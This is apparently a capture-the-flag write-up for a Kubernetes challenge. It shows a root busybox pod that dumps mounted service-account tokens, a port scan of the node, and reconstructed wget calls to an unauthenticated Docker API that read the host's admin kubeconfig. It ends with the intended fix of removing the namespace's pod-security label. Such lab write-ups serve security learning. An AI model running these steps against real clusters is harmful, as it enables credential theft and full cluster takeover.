Using `kubectl auth can-i --list`, we find we can only create pods and read their logs, but not exec into them.
If we try the payload from the previous stage, we also find that Pod Security Standards are now enforced.
The error mentions we're under the `baseline` policy, which is described [here](https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline).
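A sketch of what that permission check looks like (the namespace name and exact output are assumptions for illustration):

```shell
# List what the current service account may do in this namespace
kubectl auth can-i --list -n challenge
# Expect rows roughly like:
#   pods       []  []  [create get list watch]
#   pods/log   []  []  [get]
# with no pods/exec entry, confirming we cannot exec into pods.
```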
Initially, I created a pod like the one below to dump all the secrets mounted into it, which included a token for the namespace's default service account. I was hoping this token would have more permissions, but it turned out to be a dead end.
```yaml
apiVersion: v1
kind: Pod
metadata:
  name: get-sa-token
spec:
  containers:
  - name: get-sa-token
    image: busybox
    imagePullPolicy: IfNotPresent
    securityContext:
      runAsUser: 0
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do find /var/run/secrets -exec cat {} \\; ; sleep 30; done;" ]
```
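To retrieve the dumped secrets, the pod is applied and its log read back; roughly (file name assumed):

```shell
kubectl apply -f get-sa-token.yaml
# The loop prints ca.crt, namespace, and the service account token every 30s
kubectl logs get-sa-token
```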
Inspecting the running pod, however, we can see that the IP of the host running it is `10.0.27.88`.
We use busybox's built-in `pscan` applet to port scan this IP, since kubelets are sometimes misconfigured to allow anonymous access or similar, so it's worth investigating. (The exact arg was `"while true; do pscan -P 10000 10.0.27.88; sleep 30; done;"`.)
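The port-scanning pod is the same manifest as above with only the `args` swapped, i.e.:

```yaml
    # Scan the first 10000 TCP ports of the node, repeating every 30s,
    # and read the results back through `kubectl logs` as before
    args: [ "while true; do pscan -P 10000 10.0.27.88; sleep 30; done;" ]
```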
After trying and failing to access the kubelet, the only other open port besides SSH is 2375.
This port conventionally indicates an unauthenticated Docker daemon socket.
Unfortunately we don't have a Docker CLI available to interact with it, so we need to talk to the daemon's [API](https://docs.docker.com/engine/api/v1.42/) directly using wget.
The container we create is equivalent to `docker run -v /:/host --user=0 busybox cat /host/etc/kubernetes/admin.conf`, and we then read the output through the logs endpoint. Unfortunately I lost my exact payloads for this :(.
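Since the exact payloads are lost, here is a hedged reconstruction of the sequence (endpoint paths from the Docker Engine API reference; the container name and JSON body are illustrative, not the original payload):

```shell
DOCKER=http://10.0.27.88:2375

# Create a container with the node's root filesystem bind-mounted at /host
wget -q -O- --header='Content-Type: application/json' \
  --post-data='{"Image":"busybox","User":"0","Cmd":["cat","/host/etc/kubernetes/admin.conf"],"HostConfig":{"Binds":["/:/host"]}}' \
  "$DOCKER/containers/create?name=pwn"

# Start it (empty POST body)
wget -q -O- --post-data='' "$DOCKER/containers/pwn/start"

# Read the admin kubeconfig back from the container's logs
wget -q -O- "$DOCKER/containers/pwn/logs?stdout=true"
```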
Once we have the admin kubeconfig, we list the secrets and print them out as before to get the flag.
I found out later this wasn't actually the intended solution: it turns out you have permission to edit the namespace, so you can just remove the pod security enforcement and do the same as in k8s 4.
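For reference, with Pod Security Admission the enforcement is just a namespace label, so the intended path would look something like this ("challenge" is an assumed namespace name):

```shell
# Remove the enforce label from the namespace (trailing "-" deletes a label)
kubectl label namespace challenge pod-security.kubernetes.io/enforce-
# A privileged pod can then be created as in k8s 4
```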